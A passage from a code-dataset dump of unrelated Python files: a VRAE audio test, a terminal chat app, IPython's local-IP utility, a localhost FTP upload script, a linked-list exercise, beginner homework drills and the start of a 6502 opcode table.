wavdata.shape[1]))\nprint(\"wavdata.shape\", wavdata.shape)\n\n# patch_size = (64, 1)\n# data = extract_patches_2d(wavdata[:,:], patch_size, max_patches=None)\n# data = data.reshape(data.shape[0], -1)\nwavlen = wavdata.shape[1]\nchunklen = 1\nnumchunks = wavlen/chunklen\ndata = wavdata[0,:numchunks*chunklen].reshape((1, chunklen, numchunks))\n# data = wavdata[0,:numchunks*chunklen].reshape((chunklen, numchunks))\nprint(\"data.shape\", data.shape)\n\n\nprint(\"create_gradientfunctions\")\ndata = data.astype(np.float64)\ntdata = theano.shared(data)\nvrae.create_gradientfunctions(tdata)\n\nprint(\"save_parameters\")\nvrae.save_parameters(\"data/\")\n\nprint(\"encoding\")\nz, mu_encoder, log_sigma_encoder = vrae.encode(data[0,:1].T)\n\nprint(\"z.shape, z, mu_enc, s_enc\", z.shape, mu_encoder, log_sigma_encoder)\nnp.save(\"z.npy\", z)\n\npl.plot(z)\npl.show()\n\nprint(\"decoding\")\nx = vrae.decode(1000, latent_variables, z)\nprint(\"x.shape, x\", x.shape, x)\n\npl.plot(x)\npl.show()\n\nwavfile.write(\"x.wav\", 44100, x)\n","sub_path":"nnet/keeper_VRAE-y0ast-x75-fork-theano/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230097330","text":"# -*- coding: utf-8 -*-\nimport datetime, json, random, os, threading, time\n\nEXIT = \"exit\"\n#có thể nhìn qua cấu trúc biến config ở dòng 5, đây là kiểu dữ liệu dạng dictionary khá hay, cho phép lưu nhiều thứ trong 1 biến dưới dạng cấu trúc cây dễ dàng truy cập qua tên các node hoặc duyệt các mảng bên trong\nconfig = {\n \"s_prompt_word\": \"> \",\n \"program\": {\n \"user\": {\n \"database\": {\n \"path\": \"./user.json\"\n }\n },\n \"chat\": {\n \"banner\": {\n \"format\": {\n \"username\": [\n \"Welcome {} ^-^\",\n \"Glad you back, {} !!\"\n ]\n }\n }\n }\n },\n \"history\": {\n \"path\": \"./history.json\"\n },\n \"mailboxs\": {\n 'path': 'mailboxs'\n }\n}\nMAIN_PROGRAM_PATH = os.path.dirname(os.path.abspath(__file__))\nMAILBOXS_PATH = os.path.join(MAIN_PROGRAM_PATH, config['mailboxs']['path'])\nif not os.path.exists(MAILBOXS_PATH):\n os.makedirs(MAILBOXS_PATH)\n\n# utilities\ndef identify(var, tag=None):\n tag_presentation = \"\"\n if tag:\n tag_presentation = \"At {} identify that\".format(tag)\n if type(var) is list:\n print(tag_presentation, \"Array len\", len(var), \"is\", var)\n else:\n print(tag_presentation, type(var), var)\n\ndef get_json_element(dic, *element_maps):\n result = []\n for maps in element_maps:\n if type(maps) is list:\n pointer = dic\n for property in maps:\n pointer = pointer[property]\n element = pointer\n else:\n property = maps\n element = dic[property]\n result.append(element)\n return tuple(result)\n\n# file operators\ndef tail(file_reader, n, k=0): # open file, seek to last n line, then read k line from that line\n assert n >= 0, \"Number of tail lines must be positive integer\"\n assert k <= n, \"Can't read {} lines form last {} lines\".format(k,n)\n k = n if not k else k\n pos, lines = n+1, []\n while len(lines) <= n:\n try:\n file_reader.seek(-pos, 2)\n except IOError:\n file_reader.seek(0)\n break\n finally:\n lines = list(file_reader)\n pos *= 2\n return lines[-n:-(n-k)] if k < n else lines[-n:]\n\n\nclass Message():\n def __init__(self, in_program, from_user, to_user, message):\n # create temp attributes\n self.current_program = in_program\n self.user = from_user\n self.to_user = to_user\n self.content = None\n self.time = datetime.datetime.fromtimestamp(0)\n # assign attreibutes\n if message:\n self.content = message\n self.time = datetime.datetime.utcnow().timestamp()\n self.buildup()\n self.store()\n def __str__(self):\n return self.content\n def buildup(self):\n self.summary = json.dumps({\n \"from\": self.user.username,\n \"from_name\" : self.user.name,\n \"to\": self.to_user.username,\n \"to_name\" : self.to_user.name,\n \"message\": self.content,\n \"time\": self.time\n })\n def store(self):\n self.user.deliver_message(self.summary)\n self.to_user.deliver_message(self.summary)\n \nclass User():\n def __init__(self, d_user_data):\n self.name = d_user_data['name']\n self.username = d_user_data['username']\n self.role = d_user_data['role']\n self.mailbox = os.path.join(MAILBOXS_PATH,d_user_data['mailbox'])\n self.test_mailbox()\n \n def test_mailbox(self):\n mode = 'a' if os.path.exists(self.mailbox) else 'w'\n open(self.mailbox, mode).close()\n def deliver_message(self, summary_json_dumped):\n mode = 'a' if os.path.exists(self.mailbox) else 'w'\n with open(self.mailbox, mode) as mailbox_writer:\n mailbox_writer.writelines([summary_json_dumped + \"\\n\"])\nclass UserManager():\n def __init__(self):\n self.all_user = {}\n self.all_user_name = {}\n self.load_users()\n def load_users(self):\n with open(config['program']['user']['database']['path'], 'r') as user_database:\n self.all_user = json.load(user_database)['lauchat']\n self.all_user_name = [\n list(get_json_element(user, ['username'], ['data', 'name'], ['data', 'mailbox'], ['data', 'role']))\n for user in self.all_user\n ]\n def find_friend(self, name):\n for user in self.all_user_name:\n if name == user[0] or name == user[1]:\n return {\"username\": user[0], \"name\": user[1], 'mailbox': user[2], 'role': user[3]}\n return None\n def authenticate(self, username, password):\n self.load_users()\n for user in self.all_user:\n usern, passwd, userdata = get_json_element(user, ['username'], ['password'], ['data'])\n if usern == username and password == passwd:\n userdata['username'] = usern\n return User(userdata)\n else:\n continue\n return False\n\nclass Program():\n def __init__(self):\n self.Commands = {\n \"exit\": {\n \"do\": self.set_exit,\n \"description\": \"Exit app\"\n },\n \"commands\": {\n \"do\": self.print_commands,\n \"description\": \"Print this help\"\n },\n \"help\": {\n \"do\": self.print_commands,\n \"description\": \"Print this help\"\n }\n }\n self.current_program = Program\n self.exit_signal = False\n self.run()\n def print_commands(self):\n print(\"\\n{} commands\\n\".format(self.__class__.__name__)+\n \"\\n\".join([\"{}: {}\".format(command,command_info['description']) for command, command_info in self.Commands.items()])+\n \"\\n\")\n return False\n def set_exit(self):\n self.exit_signal = True\n return True\n def get_keyboard_input(self, prompt):\n message = input(prompt)\n #print(message in self.Commands, self.Commands)\n if message in self.Commands:\n command = message\n action = self.Commands[command]['do']\n return action()\n else:\n return message\n def run(self):\n while not self.exit_signal:\n self.user_manager = UserManager()\n authenticated = False\n while not authenticated:\n print(\"Login\")\n username = self.get_keyboard_input(\"Username: \")\n #print(\"exit signal\", self.exit_signal)\n if not self.exit_signal:\n if username:\n authenticated = self.user_manager.authenticate(username, input(\"Password: \"))\n if not authenticated:\n print(\"Wrong user credentials, retry another.\\n\")\n else:\n break\n if not self.exit_signal:\n self.session = Chat( authenticated, self.user_manager)\n program_exit_code = self.session.run()\n if program_exit_code == \"close\":\n break\n \n @staticmethod\n def notification_agent(program_chat):\n print(\"Enable notification for {}\".format(program_chat.user.name))\n last_message = {}\n while not program_chat.is_logout and not program_chat.exit_signal:\n with open(program_chat.user.mailbox, 'r') as mailbox_reader:\n last_lines = tail(mailbox_reader, 1)\n if len(last_lines): # history exsist\n # print(last_lines)\n new_message = json.loads(last_lines[0])\n if new_message['from'] != program_chat.user.username and new_message != last_message:\n last_message = new_message\n Chat.print_history_message(new_message)\n else: # new mailbox, no history\n pass # dont do anything\n time.sleep(1)\n print(\"Close notification for\", program_chat.user.name)\n return 0 # return to close thread after logout\nclass Chat(Program):\n @staticmethod\n def print_history_message(message):\n print(\"[{}:{}]>{}\".format(datetime.datetime.fromtimestamp(message['time']), message['from_name'], message['message']))\n def __init__(self, user, usermgr):\n self.Commands = {\n \"logout\": {\n \"do\": self.set_logout,\n \"description\": \"Logout for new session.\"\n },\n \"exit\": {\n \"do\": self.set_exit,\n \"description\": \"Exit app.\"\n },\n \"send to\": {\n \"do\": self.set_destination,\n \"description\": \"Set receiver.\"\n },\n \"commands\": {\n \"do\": self.print_commands,\n \"description\": \"Print this help\"\n },\n \"help\": {\n \"do\": self.print_commands,\n \"description\": \"Print this help\"\n },\n \"history\": {\n \"do\": self.load_history,\n \"description\": \"Read history on conversation\"\n }, \n \"reply\": {\n \"do\": self.reply,\n \"description\": \"Reply last sent message\"\n }, \n }\n self.usermgr = usermgr\n self.user = user\n self.current_program = Chat\n self.exit_signal = False\n self.is_logout = False\n self.destination_user = None\n \n def load_history(self):\n n_load = max(int(input(\"History length: \")), 1)\n history = []\n n = 0\n with open(self.user.mailbox, 'r') as my_mailbox_reader:\n all_mails = my_mailbox_reader.readlines()\n all_mails.reverse()\n for line in all_mails:\n message = json.loads(line)\n if [self.user.name, self.destination_user.name].sort() == [message['from'], message['to']].sort():\n history.append(message)\n n += 1\n if n == n_load:\n break\n history.reverse()\n for message in history:\n Chat.print_history_message(message)\n def reply(self):\n with open(self.user.mailbox, 'r') as my_mailbox_reader:\n l_last_mail = tail(my_mailbox_reader, 1)\n if l_last_mail:\n last_message = json.loads(l_last_mail[0])\n to_user = last_message['from'] if last_message['from'] != self.user.username else last_message['to']\n self.set_destination(to_user)\n else:\n print(\"No previous message to reply\")\n \n def set_destination(self, to_user=None):\n to_user = input(\"Send to: \") if not to_user else to_user\n result = self.usermgr.find_friend(to_user)\n if result:\n self.destination_user = User(result)\n if self.destination_user.name == self.user.name:\n print(\"To yourself\\n\")\n else:\n print(\"To {}\\n\".format(to_user))\n else:\n print(to_user, 'not found')\n def set_logout(self):\n self.is_logout = True\n self.exit_signal = True\n def show_banner(self):\n all_banners = config['program']['chat']['banner']['format']['username']\n banner = random.choice(all_banners)\n print(banner.format(self.user.name) + '\\n')\n def run(self):\n self.show_banner()\n noti_thread = threading.Thread(target=Program.notification_agent, args=(self,))\n noti_thread.start()\n noti_thread.join(0)\n self.set_destination(self.user.username)\n while not self.exit_signal:\n content = self.get_keyboard_input(config['s_prompt_word'])\n if self.exit_signal:\n continue\n else:\n Message(self, self.user, self.destination_user, content)\n print(\"Bye {}.\\n\".format(self.user.name))\n return \"logout\" if self.is_logout else \"close\"\n \n\n# main app here\nif __name__ == \"__main__\":\n Program()\n","sub_path":"HSGSchat/appchat.py","file_name":"appchat.py","file_ext":"py","file_size_in_byte":12255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632377090","text":"\"\"\"Simple utility for building a list of local IPs using the socket module.\nThis module defines two constants:\n\nLOCALHOST : The loopback interface, or the first interface that points to this\n machine. It will *almost* always be '127.0.0.1'\n\nLOCAL_IPS : A list of IP addresses, loopback first, that point to this machine.\n\nPUBLIC_IPS : A list of public IP addresses that point to this machine.\n Use these to tell remote clients where to find you.\n\"\"\"\n#-----------------------------------------------------------------------------\n# Copyright (C) 2010-2011 The IPython Development Team\n#\n# Distributed under the terms of the BSD License. The full license is in\n# the file COPYING, distributed as part of this software.\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\n\nimport socket\n\nfrom .data import uniq_stable\n\n#-----------------------------------------------------------------------------\n# Code\n#-----------------------------------------------------------------------------\n\nLOCAL_IPS = []\nPUBLIC_IPS = []\n\nLOCALHOST = '127.0.0.1'\n\ndef _only_once(f):\n \"\"\"decorator to only run a function once\"\"\"\n f.called = False\n def wrapped():\n if f.called:\n return\n ret = f()\n f.called = True\n return ret\n return wrapped\n\ndef _requires_ips(f):\n \"\"\"decorator to ensure load_ips has been run before f\"\"\"\n def ips_loaded(*args, **kwargs):\n _load_ips()\n return f(*args, **kwargs)\n return ips_loaded\n\n@_only_once\ndef _load_ips():\n \"\"\"load the IPs that point to this machine\n \n This function will only ever be called once.\n \"\"\"\n global LOCALHOST\n try:\n LOCAL_IPS[:] = socket.gethostbyname_ex('localhost')[2]\n except socket.error:\n pass\n \n try:\n hostname = socket.gethostname()\n PUBLIC_IPS[:] = socket.gethostbyname_ex(hostname)[2]\n # try hostname.local, in case hostname has been short-circuited to loopback\n if not hostname.endswith('.local') and all(ip.startswith('127') for ip in PUBLIC_IPS):\n PUBLIC_IPS[:] = socket.gethostbyname_ex(socket.gethostname() + '.local')[2]\n except socket.error:\n pass\n finally:\n PUBLIC_IPS[:] = uniq_stable(PUBLIC_IPS)\n LOCAL_IPS.extend(PUBLIC_IPS)\n\n # include all-interface aliases: 0.0.0.0 and ''\n LOCAL_IPS.extend(['0.0.0.0', ''])\n\n LOCAL_IPS[:] = uniq_stable(LOCAL_IPS)\n\n LOCALHOST = LOCAL_IPS[0]\n\n@_requires_ips\ndef local_ips():\n \"\"\"return the IP addresses that point to this machine\"\"\"\n return LOCAL_IPS\n\n@_requires_ips\ndef public_ips():\n \"\"\"return the IP addresses for this machine that are visible to other machines\"\"\"\n return PUBLIC_IPS\n\n@_requires_ips\ndef localhost():\n \"\"\"return ip for localhost (almost always 127.0.0.1)\"\"\"\n return LOCALHOST\n\n@_requires_ips\ndef is_local_ip(ip):\n \"\"\"does `ip` point to this machine?\"\"\"\n return ip in LOCAL_IPS\n\n@_requires_ips\ndef is_public_ip(ip):\n \"\"\"is `ip` a publicly visible address?\"\"\"\n return ip in PUBLIC_IPS\n","sub_path":"IPython/utils/localinterfaces.py","file_name":"localinterfaces.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"625726286","text":"import ftplib\r\nimport os\r\nimport time\r\n\r\nfilename = \"curCam.mp4\"\r\nftp = ftplib.FTP()\r\n\r\nftp.connect(\"127.0.0.1\", 21)\r\nftp.login(\"CPTV_admin\", \"2204\")\r\nftp.cwd(\"./\")\r\n\r\nmyfile = open(filename, 'rb')\r\nftp.storbinary('STOR ' + filename, myfile)\r\nnewFileName = str(time.time()) + '_.mp4'\r\nftp.rename(filename, newFileName)\r\n\r\nmyfile.close()\r\nftp.close","sub_path":"shKIM_CPTV_module/moduleTest/ftpCli.py","file_name":"ftpCli.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"73566474","text":"'''反转从位置 m 到 n 的链表。请使用一趟扫描完成反转。\n\n说明:\n1 ≤ m ≤ n ≤ 链表长度。\n\n示例:\n\n输入: 1->2->3->4->5->NULL, m = 2, n = 4\n输出: 1->4->3->2->5->NULL'''\n\n\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def reverseBetween(self, head, m, n):\n \"\"\"\n :type head: ListNode\n :type m: int\n :type n: int\n :rtype: ListNode\n \"\"\"\n first=ListNode(0)\n first.next=head\n position=1\n\n # pLast=ListNode(None)\n # pBegin=ListNode(None)\n\n while head.next:\n if position 66:\n v = li[i]\n l.append(v)\n elif li[i] < 66:\n v1 = li[i]\n L.append(v1)\n else:\n pass\ndic.update({'k1': l, 'k2': L})\nprint(dic)\n\n\n#二、查找\n#查找列表中元素,移除每个元素的空格,并查找以 a或A开头 并且以 c 结尾的所有元素。\nli = [\"alec\", \" aric\", \"Alex\", \"Tony\", \"rain\"]\ntu = (\"alec\", \" aric\", \"Alex\", \"Tony\", \"rain\")\ndic = {'k1': \"alex\", 'k2': \"aric\", \"k3\": \"Alex\", \"k4\": \"Tony\"}\nfor i in li:\n#元祖把li换成tu,字典把li换成dic.values(),其他不变\n v = i.strip()\n v1 = v.startswith('a')\n v2 = v.startswith('A')\n v3 = v.endswith('c')\n if v1 == True or v2 == True and v3 == True:\n print(v)\n else:\n pass\n\n\n\n#三、输出商品列表,用户输入序号,显示用户选中的商品\nli = [\"手机\", \"电脑\", '鼠标垫', '游艇']\nfor i,j in enumerate(li,0):\n print(i,j)\ns = input('输入序号:')\nv = int(s) % 4\nprint(li[v])\n\n#四、购物车\n\"\"\"\n功能要求:\n要求用户输入总资产,例如:2000\n显示商品列表,让用户根据序号选择商品,加入购物车\n购买,如果商品总额大于总资产,提示账户余额不足,否则,购买成功。\n附加:可充值、某商品移除购物车\n\"\"\"\niphone = [\n [\"iphone 5s\", 200],\n [\"iphone 6\", 300],\n [\"iphone 8\", 400],\n [\"iphone Xr\", 500]\n]\niphone_list = []\ncount = 0\n# 要求用户输入总资产,例如:2000\ns = input('请输入总资产:')\ns = int(s)\nfor i in iphone:\n print(i, sep='\\n')\nwhile True:\n i = input('请输入商品序号0,1,2,3:')\n if i.upper() == 'Q':\n break\n i = int(i)\n iphone_lis = iphone[i] # 购买的商品\n iphone_list.append(iphone_lis) # 购买的商品列表\n count += iphone_lis[1] # iphone_lis[0]: 商品名称, iphone_lis[1]: 商品价格\n if count > s:\n print('余额不足, 总计', count, '请选择移除商品或者充值购买')\n i = input('请选择(1.移除商品, 2.充值购买):')\n if i == '1':\n while True:\n print(iphone_list, count)\n i = input('请输入移除商品索引号码:')\n if i == 'q' or i == 'Q':\n print('你可以继续选择商品啦。。。')\n break\n i = int(i)\n if i >= len(iphone_list):\n print(\"商品索引有限,商品总计:\", len(iphone_list))\n continue\n count = count - iphone_list[i][1]\n iphone_list.pop(i)\n elif i == '2':\n while True:\n print(iphone_list, count)\n i = input('请输入充值金额:')\n i = int(i)\n s = s + i\n print('你可以继续选择商品啦。。。, 目前账户总资产:', s)\n if s > count:\n break\n else:\n continue\n else:\n print(\"输入错误。。。。。\")\n else:\n print(iphone_list, count, '可以购买')\n\nprint('购买的商品', iphone_list, '\\n商品总价', count, '\\n账户总额', s)\n\n\n\n\n\n#五:九九乘法表\nfor i in range(1, 10):\n s = ''\n for j in range(1, i+1):\n s += str(i)+'*'+str(j)+\"=\"+str(i*j)+'\\t'\n print(s)\n\n\ns = ''\nfor i in range(1, 10):\n for j in range(1, i+1):\n s = str(i) + '*' + str(j) + \"=\" + str(i * j) + '\\t'\n print(s, end='')\n print()\n\n#六:用下划线将列表的每一个元素拼接\nli = ['alex','eric',123]\nli[2]=str(li[2])\nprint('_'.join(li))\n\n\n#七:写代码,如下元祖,按要求实现每一个功能\ntu = ('alex','eric','ranin')\n#a:计算元祖长度并输出\nprint(len(tu))\n#b:获取元祖的第2个元素并输出\nprint(tu[2])\n#c:获取元祖的第1—2个元素,并输出\nprint(tu[1:90])\n#d:请使用for输出元祖的元素\nfor i in tu:\n print(i)\n#e:请使用for,len,range输出元祖的索引\nfor j in range(0,len(tu)):\n print(j)\n#f:请使用enumerate输出元祖元素和序号(序号从10开始)\nfor i, j in enumerate(tu,10):\n print(i, j)\n\n\n\n#八:有如下变量,请实现要求的功能\ntu = ('alex',[11,22,{'k1':'v1','k2':['age','name'],'k3':(11,22,33)}],44)\n#a:讲述元祖的特性\n\"\"\"\n1;有序性\n2:一级元素不可被修改,删除\n\"\"\"\n#b:请问tu变量中的第一个元素'alex'是否可以被修改————》不可以\n#c:k️2对应的值是列表,可以,\ntu[1][2]['k2'].append('seven')\nprint(tu)\n#d:k3对应的是元祖,不可以\n\n\n\n#九:字典\ndic = {'k1': 'v1', 'k2': 'v2', 'k3': [11, 22, 33]}\n#请循环输出所有的key\nfor i in dic:\n print(i)\nfor i in dic.keys():\n print(i)\n#输出所有的value\nfor i in dic.values():\n print(i)\n#输出所有的key和value\nfor i in dic.items():\n print(i)\nfor i in dic:\n print(i, dic[i])\n#添加'k4':'v4'在词典最后\ndic.update({'k4': 'v4'})\nprint(dic)\n#修改k1对应的值为alex\ndic.update({'k1': 'alex'})\nprint(dic)\n#在k3后追加一个元素44\ndic['k3'].append(44)\nprint(dic)\n#在k3对应的值的第 1 个位置插入个元素18\ndic['k3'].insert(1, 18)\nprint(dic)\n\n\n\n\n# 十:转换\n# a:将字符串s='alex'转换成列表\ns = 'alex'\nv = list(s)\nprint(v)\n#b:将字符串s='alex'转换成元祖\ns = 'alex'\nv = tuple(s)\nprint(v)\n\n\n\n\n# 十一:列举布尔值是False的所有值\n# 一共有七个 {} () [] None 0 '' False\n\n\n\n\n# 十二:分页显示内容\n# a:通过for循环创建301条数据,数据类型不限制\n# b:分页,每页显示十条内容\n# li = []\n# for i in range(1, 302):\n# s = 'alex'+'_'+str(i)+'\\t''alex@live.com'+'_'+str(i)+'\\t''pwd' + '_' + str(i)\n# li.append(s)\n# print(s.expandtabs(20))\n# v = input('请输入页码:')\n# v = int(v)\n# start = (v - 1) * 10\n# end = v * 10\n# for i in li[start:end]:\n# print(i)\n\nli = []\nfor i in range(1, 302):\n s = \"alex_{add}\\talex@live.com_{add}\\tpwd_{add}\".format(add=str(i))\n # s = \"alex_{add}\\talex@live.com_{add}\\tpwd_{add}\".format(**{'add': str(i)})\n # s = \"alex_{add}\\talex@live.com_{add}\\tpwd_{add}\".format_map({'add': str(i)})\n li.append(s)\n print(s.expandtabs(20))\nv = input('请输入页码:')\nv = int(v)\nstart = (v - 1) * 10\nend = v * 10\nfor i in li[start:end]:\n print(i)\n\n\n\n#十三:有1,2,3,4,5,6,7,8个数字,能组成多少个互不相同的两位数\ncount = 0\nfor i in range(1, 9):\n for j in range(1, 9):\n if i != j:\n count += 1\nprint(count)\n\n\n\n\n# 十四:有一个列表,求出相加为9对应的元素\n# 对应的索引\nnums = [2, 7, 11, 15, 1, 8, 7]\nfor i in range(len(nums)):\n for j in range(len(nums)):\n if nums[i]+nums[j] == 9 and i != j:\n print(i, j)\n# 对应的元素\nnums = [2, 7, 11, 15, 1, 8, 7]\nfor i in nums:\n for j in nums:\n if i + j == 9 and i != j:\n print(i, j)\n\n\n\n# 十五:公鸡5文钱一只,母鸡3文钱一只,小鸡3只1文钱;用100文钱买100只鸡的组合\nfor i in range(1,100//5):\n for j in range(1,100//3):\n for z in range(1,99):\n if i+j+z == 100 and 5*i+3*j+z/3 == 100:\n print('购买公鸡数', i, '购买母鸡数', j, '购买小鸡数', z, sep=':')\n","sub_path":"code/Day13_homewo/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":7554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"266591347","text":"from cpu import AddressingMode\n\n\nclass OpCode:\n def __init__(self,\n code: 'u8',\n mnemonic: \"&'static str\",\n len: 'u8',\n cycles: 'u8',\n mode: 'AddressingMode'):\n self.code = code\n self.mnemonic = mnemonic\n self.len = len\n self.cycles = cycles\n self.mode = mode\n\n\nCPU_OPS_CODES = [\n OpCode(0x00, 'BRK', 1, 7, AddressingMode.NoneAddressing),\n OpCode(0xea, 'NOP', 1, 2, AddressingMode.NoneAddressing),\n\n # --- Arithmetic\n OpCode(0x69, 'ADC', 2, 2, AddressingMode.Immediate),\n OpCode(0x65, 'ADC', 2, 3, AddressingMode.ZeroPage),\n OpCode(0x75, 'ADC', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0x6d, 'ADC', 3, 4, AddressingMode.Absolute),\n # /*+1 if page crossed*/\n OpCode(0x7d, 'ADC', 3, 4, AddressingMode.Absolute_X),\n # /*+1 if page crossed*/\n OpCode(0x79, 'ADC', 3, 4, AddressingMode.Absolute_Y),\n OpCode(0x61, 'ADC', 2, 6, AddressingMode.Indirect_X),\n # /*+1 if page crossed*/\n OpCode(0x71, 'ADC', 2, 5, AddressingMode.Indirect_Y),\n # ---\n OpCode(0xe9, 'SBC', 2, 2, AddressingMode.Immediate),\n OpCode(0xe5, 'SBC', 2, 3, AddressingMode.ZeroPage),\n OpCode(0xf5, 'SBC', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0xed, 'SBC', 3, 4, AddressingMode.Absolute),\n # /*+1 if page crossed*/\n OpCode(0xfd, 'SBC', 3, 4, AddressingMode.Absolute_X),\n # /*+1 if page crossed*/\n OpCode(0xf9, 'SBC', 3, 4, AddressingMode.Absolute_Y),\n OpCode(0xe1, 'SBC', 2, 6, AddressingMode.Indirect_X),\n # /*+1 if page crossed*/\n OpCode(0xf1, 'SBC', 2, 5, AddressingMode.Indirect_Y),\n # ---\n OpCode(0x29, 'AND', 2, 2, AddressingMode.Immediate),\n OpCode(0x25, 'AND', 2, 3, AddressingMode.ZeroPage),\n OpCode(0x35, 'AND', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0x2d, 'AND', 3, 4, AddressingMode.Absolute),\n # /*+1 if page crossed*/\n OpCode(0x3d, 'AND', 3, 4, AddressingMode.Absolute_X),\n # /*+1 if page crossed*/\n OpCode(0x39, 'AND', 3, 4, AddressingMode.Absolute_Y),\n OpCode(0x21, 'AND', 2, 6, AddressingMode.Indirect_X),\n # /*+1 if page crossed*/\n OpCode(0x31, 'AND', 2, 5, AddressingMode.Indirect_Y),\n # ---\n # /*+1 if page crossed*/\n OpCode(0x49, 'EOR', 2, 2, AddressingMode.Immediate),\n OpCode(0x45, 'EOR', 2, 3, AddressingMode.ZeroPage),\n OpCode(0x55, 'EOR', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0x4d, 'EOR', 3, 4, AddressingMode.Absolute),\n OpCode(0x5d, 'EOR', 3, 4, AddressingMode.Absolute_X),\n # /*+1 if page crossed*/\n OpCode(0x59, 'EOR', 3, 4, AddressingMode.Absolute_Y),\n OpCode(0x41, 'EOR', 2, 6, AddressingMode.Indirect_X),\n # /*+1 if page crossed*/\n OpCode(0x51, 'EOR', 2, 5, AddressingMode.Indirect_Y),\n\n # ---\n OpCode(0x09, 'ORA', 2, 2, AddressingMode.Immediate),\n OpCode(0x05, 'ORA', 2, 3, AddressingMode.ZeroPage),\n OpCode(0x15, 'ORA', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0x0d, 'ORA', 3, 4, AddressingMode.Absolute),\n # /*+1 if page crossed*/\n OpCode(0x1d, 'ORA', 3, 4, AddressingMode.Absolute_X),\n # /*+1 if page crossed*/\n OpCode(0x19, 'ORA', 3, 4, AddressingMode.Absolute_Y),\n OpCode(0x01, 'ORA', 2, 6, AddressingMode.Indirect_X),\n # /*+1 if page crossed*/\n OpCode(0x11, 'ORA', 2, 5, AddressingMode.Indirect_Y),\n\n # --- Shifts\n OpCode(0x0a, 'ASL', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x06, 'ASL', 2, 5, AddressingMode.ZeroPage),\n OpCode(0x16, 'ASL', 2, 6, AddressingMode.ZeroPage_X),\n OpCode(0x0e, 'ASL', 3, 6, AddressingMode.Absolute),\n OpCode(0x1e, 'ASL', 3, 7, AddressingMode.Absolute_X),\n # ---\n OpCode(0x4a, 'LSR', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x46, 'LSR', 2, 5, AddressingMode.ZeroPage),\n OpCode(0x56, 'LSR', 2, 6, AddressingMode.ZeroPage_X),\n OpCode(0x4e, 'LSR', 3, 6, AddressingMode.Absolute),\n OpCode(0x5e, 'LSR', 3, 7, AddressingMode.Absolute_X),\n # ---\n OpCode(0x2a, 'ROL', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x26, 'ROL', 2, 5, AddressingMode.ZeroPage),\n OpCode(0x36, 'ROL', 2, 6, AddressingMode.ZeroPage_X),\n OpCode(0x2e, 'ROL', 3, 6, AddressingMode.Absolute),\n OpCode(0x3e, 'ROL', 3, 7, AddressingMode.Absolute_X),\n # ---\n OpCode(0x6a, 'ROR', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x66, 'ROR', 2, 5, AddressingMode.ZeroPage),\n OpCode(0x76, 'ROR', 2, 6, AddressingMode.ZeroPage_X),\n OpCode(0x6e, 'ROR', 3, 6, AddressingMode.Absolute),\n OpCode(0x7e, 'ROR', 3, 7, AddressingMode.Absolute_X),\n # ---\n OpCode(0xe6, 'INC', 2, 5, AddressingMode.ZeroPage),\n OpCode(0xf6, 'INC', 2, 6, AddressingMode.ZeroPage_X),\n OpCode(0xee, 'INC', 3, 6, AddressingMode.Absolute),\n OpCode(0xfe, 'INC', 3, 7, AddressingMode.Absolute_X),\n # ---\n OpCode(0xe8, 'INX', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0xc8, 'INY', 1, 2, AddressingMode.NoneAddressing),\n # ---\n OpCode(0xc6, 'DEC', 2, 5, AddressingMode.ZeroPage),\n OpCode(0xd6, 'DEC', 2, 6, AddressingMode.ZeroPage_X),\n OpCode(0xce, 'DEC', 3, 6, AddressingMode.Absolute),\n OpCode(0xde, 'DEC', 3, 7, AddressingMode.Absolute_X),\n # ---\n OpCode(0xca, 'DEX', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x88, 'DEY', 1, 2, AddressingMode.NoneAddressing),\n # ---\n OpCode(0xc9, 'CMP', 2, 2, AddressingMode.Immediate),\n OpCode(0xc5, 'CMP', 2, 3, AddressingMode.ZeroPage),\n OpCode(0xd5, 'CMP', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0xcd, 'CMP', 3, 4, AddressingMode.Absolute),\n # /*+1 if page crossed*/\n OpCode(0xdd, 'CMP', 3, 4, AddressingMode.Absolute_X),\n # /*+1 if page crossed*/\n OpCode(0xd9, 'CMP', 3, 4, AddressingMode.Absolute_Y),\n OpCode(0xc1, 'CMP', 2, 6, AddressingMode.Indirect_X),\n # /*+1 if page crossed*/\n OpCode(0xd1, 'CMP', 2, 5, AddressingMode.Indirect_Y),\n # ---\n OpCode(0xc0, 'CPY', 2, 2, AddressingMode.Immediate),\n OpCode(0xc4, 'CPY', 2, 3, AddressingMode.ZeroPage),\n OpCode(0xcc, 'CPY', 3, 4, AddressingMode.Absolute),\n # ---\n OpCode(0xe0, 'CPX', 2, 2, AddressingMode.Immediate),\n OpCode(0xe4, 'CPX', 2, 3, AddressingMode.ZeroPage),\n OpCode(0xec, 'CPX', 3, 4, AddressingMode.Absolute),\n\n # --- Branching\n # //AddressingMode that acts as Immidiate\n OpCode(0x4c, 'JMP', 3, 3, AddressingMode.NoneAddressing),\n # //AddressingMode:Indirect with 6502 bug\n OpCode(0x6c, 'JMP', 3, 5, AddressingMode.NoneAddressing),\n OpCode(0x20, 'JSR', 3, 6, AddressingMode.NoneAddressing),\n OpCode(0x60, 'RTS', 1, 6, AddressingMode.NoneAddressing),\n 